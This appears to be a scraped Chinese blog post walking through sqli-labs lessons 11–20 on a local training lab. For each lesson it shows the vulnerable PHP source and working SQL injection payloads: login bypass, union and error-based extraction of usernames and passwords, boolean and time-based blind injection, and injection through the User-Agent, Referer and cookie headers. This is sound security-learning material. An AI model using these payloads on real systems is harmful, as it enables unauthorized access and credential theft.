SQLI-LAB 的 实战记录(Less 11 - Less 20)
来源:互联网 发布:天天炫舞抽坐骑软件 编辑:程序博客网 时间:2024/05/01 07:59
- Less - 11 Error Based- String
- Test
- Sourse Code
- Solution
- Less - 12 Error Based- Double quotes- String
- Test
- Sourse Code
- Solution
- Less - 13 Double Injection- String- with twist
- Test
- Sourse Code
- Solution
- Less - 14 Double Injection- Double quotes- String
- Test
- Sourse Code
- Solution
- Less - 15 Blind- Boolian Based- String
- Test
- Sourse Code
- Solution
- Less - 16 Blind- Time Based- Double quotes- String
- Test
- Sourse Code
- Solution
- Less - 17 Update Query- Error based - String
- Test
- Sourse Code
- Solution
- Less - 18 Header Injection- Error Based- string
- Test
- Sourse Code
- Solution
- Less - 19 Header Injection- Referer- Error Based- string
- Test
- Sourse Code
- Solution
- Less - 20 POST - Cookie injections - Uagent field - error based
- Test
- Sourse Code
- Solution
以下内容 只是本人在做 sqli-lab 练习时 写下的记录,仅供参考。
因为本人学过一些 sql注入 的内容,所以大部分内容是没有讲解的,如有不清楚的地方,请自行使用搜索引擎查询,相信会得到所需的内容。
Less - 11 Error Based- String
(第11课:基于错误 - 字符型)
Test:
http://localhost/sqli-lab/Less-11/index.php uname=' &passwd=' &submit=Submit
注:这个是报错的。
建议用火狐浏览器的HackBar或者Burp来做测试
POST 格式 是用 Burp 截的,其实变量名可以直接右键看网页的源代码。
听说过万能密码么?可以考虑使用
Sourse Code:
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ echo 'Your Login name:'. $row['username']; echo 'Your Password:' .$row['password']; echo '<img src="../images/flag.jpg" />'; }else{ print_r(mysql_error()); echo '<img src="../images/slap.jpg" />'; }
Solution:
uname= ' or '1'='1 &passwd= ' or '1'='1 &submit=Submit uname= ' or 1=1 --+ &passwd= ' or 1=1 --+ &submit=Submit uname= ' or 1=1 # &passwd= ' or 1=1 # &submit=Submit 其它: uname= ' union select database(),6 --+ &passwd= ' union select database(),6 --+ &submit=Submit uname= ' union select (select group_concat(table_name) from information_schema.tables where table_schema='security'),6 --+ &passwd= ' --+ &submit=Submit uname= ' union select (select group_concat(username) from security.users),6 --+ &passwd= ' --+ &submit=Submit
Less - 12 Error Based- Double quotes- String
(第12课:基于错误 - 双引号 - 字符串)
Test:
http://localhost/sqli-lab/Less-12/index.php uname= ") &passwd= " &submit=Submit
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘”) and password=(” ” “) LIMIT 0,1’ at line 1
注:直接就指出了 $uname
和$passwd
周围是双引号和一层括号
Sourse Code:
$uname='"'.$uname.'"';$passwd='"'.$passwd.'"';@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ echo 'Your Login name:'. $row['username']; echo 'Your Password:' .$row['password']; echo '<img src="../images/flag.jpg" />'; }else{ print_r(mysql_error()); echo '<img src="../images/slap.jpg" />'; }
Solution:
uname= ")or ("1")=("1 &passwd= ")or ("1")=("1 &submit=Submit uname= ") or 1=1 # &passwd= ") or 1=1 # &submit=Submit 其它: uname= ") union select database(),6 # &passwd= ") or 1=1 # &submit=Submit uname= ") union select (select group_concat(table_name) from information_schema.tables where table_schema='security'),6 # &passwd= ") or 1=1 # &submit=Submit uname= ") union select (select group_concat(username) from security.users),6 # &passwd= ") or 1=1 # &submit=Submit
Less - 13 Double Injection- String- with twist
(第13课:双注入 - 字符型 - 变形)
Test:
http://localhost/sqli-lab/Less-13/index.php uname= 0' &passwd= 0' &submit=Submit
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘0’ ‘) LIMIT 0,1’ at line 1
注:直接就指出了 $uname
和$passwd
周围是单引号和一层括号
Sourse Code:
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ echo '<img src="../images/flag.jpg" />'; }else{ print_r(mysql_error()); echo '<img src="../images/slap.jpg" />'; }
Solution:
uname= ') or ('1')=('1 &passwd= ') or ('1')=('1 &submit=Submit uname= ') or 1=1 # &passwd= ') or 1=1 # &submit=Submit 其它: uname= ') union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit uname= ') union select count(*),concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit uname= ') union select 1,2 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit uname= ') union select 1,2 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit uname= ') union select 1,2 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit uname= ') union select 1,2 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit uname= ') union select 1,2 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit
Less - 14 Double Injection- Double quotes- String
(第14课:双注入 - 双引号 - 字符串)
Test:
http://localhost/sqli-lab/Less-14/index.php uname= "&passwd=' &submit=Submit
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” ” LIMIT 0,1’ at line 1
注:能看出 $uname
和$passwd
周围只有双引号
Sourse Code:
$uname='"'.$uname.'"'; $passwd='"'.$passwd.'"'; @$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row){ echo '<img src="../images/flag.jpg" />'; }else{ print_r(mysql_error()); echo '<img src="../images/slap.jpg" />'; }
Solution:
uname= " or "1"="1&passwd=" or "1"="1 &submit=Submit uname=" or 1=1 --+&passwd=" or 1=1 --+&submit=Submit uname=" or 1=1 #&passwd=" or 1=1 #&submit=Submit 其它: uname= " union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit uname= " union select 1,2 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit uname= " union select 1,2 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit uname= " union select 1,2 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit uname= " union select 1,2 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit uname= " union select 1,2 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit
Less - 15 Blind- Boolian Based- String
(第15课:盲注 - 基于布尔值 - 字符串)
Test:
http://localhost/sqli-lab/Less-15/index.php uname=" or 1=1 # &passwd=" or 1=1 # &submit=Submit uname=' or 1=1 #&passwd=' or 1=1 #&submit=Submit
注:第一个错了,第二个对了,被单引号包围,没有回显,考虑盲注。
Sourse Code:
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ echo '<img src="../images/flag.jpg" />'; }else{ echo '<img src="../images/slap.jpg" />'; }
Solution:
uname=' or '1'='1 &passwd=' or '1'='1 &submit=Submit uname=' or 1=1 #&passwd=' or 1=1 #&submit=Submit 其它: uname=' or (length(database())) = 8 #&passwd=' or 1=1 #&submit=Submit uname=' or (ascii(substr((select database()) ,1,1))) = 115 #&passwd=' or 1=1 #&submit=Submit
Less - 16 Blind- Time Based- Double quotes- String
(第16课:盲注 - 基于时间 - 双引号 - 字符串)
Test:
http://localhost/sqli-lab/Less-16/index.php uname=' or 1=1 # &passwd=' or 1=1 #&submit=Submit uname=") or 1=1 # &passwd=") or 1=1 # &submit=Submit
注:第一个错了,第二个对了,被双引号包围,没有回显,考虑盲注。
它的回显图片暴露了对错,所以是基于布尔值或是基于时间都行。
Sourse Code:
$uname='"'.$uname.'"';$passwd='"'.$passwd.'"'; @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ echo '<img src="../images/flag.jpg" />'; }else{ echo '<img src="../images/slap.jpg" />'; }
Solution:
uname=") or ("1")=("1 &passwd=") or ("1")=("1 &submit=Submit uname=") or 1=1 or if(1=1, sleep(1), null) #&passwd=") or 1=1 #&submit=Submit 其它: uname=") or (length(database())) = 8 #&passwd=") or 1=1 #&submit=Submit uname=") or (ascii(substr((select database()) ,1,1))) = 115 or if(1=1, sleep(1), null) #&passwd=") or 1=1 #&submit=Submit
Less - 17 Update Query- Error based - String
(第17课:更新查询 - 基于错误 - 字符串)
Test:
http://localhost/sqli-lab/Less-17/index.php
注:标题是密码重置,输入框就一个用户名,一个新密码,猜对用户名就好
Sourse Code:
$uname = check_input($_POST['uname']);$passwd = check_input($_POST['passwd']);@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ $row1 = $row['username']; $update="UPDATE users SET password = '$passwd' WHERE username='$row1'"; mysql_query($update); if (mysql_error()){ print_r(mysql_error()); }else{ } echo '<img src="../images/flag1.jpg" />'; }else{ echo '<img src="../images/slap1.jpg" />';}
注:对 $uname
和$passwd
字段有检查
Solution:
uname=admin&passwd=666&submit=Submit 其它: uname=Dumb&passwd=666&submit=Submit uname=Angelina&passwd=666&submit=Submit uname=secure&passwd=666&submit=Submit
Less - 18 Header Injection- Error Based- string
(第18课: 头部注入 - 基于错误 - 字符串)
Test:
http://localhost/sqli-lab/Less-18/index.php uname=admin&passwd=admin&submit=Submit
Your IP ADDRESS is: 127.0.0.1
Your User Agent is: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
注:建议使用火狐的Modify Headers 或 Burp 修改 user-agent的值
已经将上一次练习中动过的 数据库的值改回来了。
Sourse Code:
$uname = check_input($_POST['uname']);$passwd = check_input($_POST['passwd']);$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";$result1 = mysql_query($sql);$row1 = mysql_fetch_array($result1);if($row1){ $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)"; mysql_query($insert); echo 'Your User Agent is: ' .$uagent; print_r(mysql_error()); echo '<img src="../images/flag.jpg" />';}else{ print_r(mysql_error()); echo '<img src="../images/slap.jpg" />'; }
注:对 $uname
和$passwd
字段有检查
Solution:
' or '1' = '1 其它: ' or (length(database())) = 8 or if(1=1, sleep(5), null) or '1' = '1
注:以上是user agent 的值,基于时间的盲注,如果不对会延时5s
Less - 19 Header Injection- Referer- Error Based- string
(第19课:头部注入 - Referer字段 - 基于错误- 字符串 )
Test:
http://localhost/sqli-lab/Less-19/index.php uname=admin&passwd=admin&submit=Submit
Your IP ADDRESS is: 127.0.0.1
Your Referer is:
注:建议使用火狐的Modify Headers 或 Burp 修改 referer的值
Sourse Code:
$uname = check_input($_POST['uname']);$passwd = check_input($_POST['passwd']);$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";$result1 = mysql_query($sql);$row1 = mysql_fetch_array($result1);if($row1){ $insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')"; mysql_query($insert); echo 'Your Referer is: ' .$uagent; print_r(mysql_error()); echo '<img src="../images/flag.jpg" />';}else{ print_r(mysql_error()); echo '<img src="../images/slap.jpg" />'; }
注:对 $uname
和$passwd
字段有检查
Solution:
' or '1' = '1 其它: ' or (length(database())) = 8 or if(1=1, sleep(5), null) or '1' = '1
注:以上是referer 的值,基于时间的盲注,如果不对,会延时5s
Less - 20 POST - Cookie injections - Uagent field - error based
(第20课:POST – cookie 注入 - Uagent字段 - 基于错误)
Test:
http://localhost/sqli-lab/Less-20/index.php uname=Dumb&passwd=Dumb&submit=Submit
注:先登录,比如你知道一个账号 uname:Dumb,pwd:Dumb
登录以后会显示用户名 密码 Id cookie IP地址 User Agent。
可以使用火狐浏览器的Firebug来修改cookie中$uname
的值。
记得把过期时间也改了,不然刚改完$uname
的值,cookie就过期了。。。
Sourse Code:
无cookie时 登录部分$uname = check_input($_POST['uname']);$passwd = check_input($_POST['passwd']);$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";$result1 = mysql_query($sql);$row1 = mysql_fetch_array($result1);$cookee = $row1['username'];if($row1){ setcookie('uname', $cookee, time()+3600); header ('Location: index.php'); print_r(mysql_error()); echo '<img src="../images/flag.jpg" />';}else{ print_r(mysql_error()); echo '<img src="../images/slap.jpg" />'; }有cookie时 登录部分$cookee = $_COOKIE['uname'];$format = 'D d M Y - H:i:s';$timestamp = time() + 3600; echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR']; echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";$result=mysql_query($sql);if (!$result){ die('Issue with your mysql: ' . mysql_error());}$row = mysql_fetch_array($result);if($row){ echo 'Your Login name:'. $row['username']; echo 'Your Password:' .$row['password']; echo 'Your ID:' .$row['id'];}else{ echo '<img src="../images/slap1.jpg" />';}
注:对 $uname
和$passwd
字段有检查,有cookie时 从数据库中显示的数据是 username、password和id
Solution:
Dumb ' or 1=1 # 其它: ' union select 1,database(),6 or 1=1 # ' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+ ' union select 1,group_concat(username),group_concat(password) from security.users #
注:以上是cookie中uname的值
- SQLI-LAB 的 实战记录(Less 11 - Less 20)
- SQLI-LAB 的 实战记录(Less 1 - Less 10)
- SQLI-LAB 的 实战记录(Less 21 - Less 30)
- SQLI-LAB 的 实战记录(Less 31 - Less 40)
- SQLI-LAB 的 实战记录(Less 41 - Less 53)
- SQLI-LAB 的 实战记录(Less 54 - Less 65)
- SQLi-Labs 学习笔记(Less 11-20)
- sqli-labs ---- Less-2
- sqli-labs ---- Less-7
- sqli-labs ---- Less-5 & Less-6
- sqli-labs ---- Less-1 & Less-3 & Less-4
- sqli-labs ---- Less-8 & Less-9 & Less-10
- sqli-labs ---- Less-8 & Less-9 & Less-10
- [sqli-labs]Less-1(明注)
- 【SQL注入之sqli-labs】Less 1
- 【SQL注入之sqli-labs】Less 6
- less
- less
- [刷题]算法竞赛入门经典 3-1/UVa1585 3-2/UVa1586 3-3/UVa1225
- 最大堆---实现一个简化的搜索提示系统。给定一个包含了用户query的日志文件,对于输入的任意一个字符串s,输出以s为前缀的在日志中出现频率最高的前10条query。
- UVA-424 Integer Inquiry
- WINDOWS环境下通过Xmanger远程连接CENTOS图形桌面【转】
- 龟兔赛跑
- SQLI-LAB 的 实战记录(Less 11 - Less 20)
- servlet实现请求转发和请求重定向的特性与区别
- Linux下控制免驱USB摄像头的信息
- maven开发环境,写第一个HelloWorld
- JS修改CSS的三种方式
- UVA-156 Ananagrams
- Handler机制-----我的理解
- 树莓派GPIO的编号规范
- 【linux c】c语言十进制数转换为十六进制输出_学习笔记_005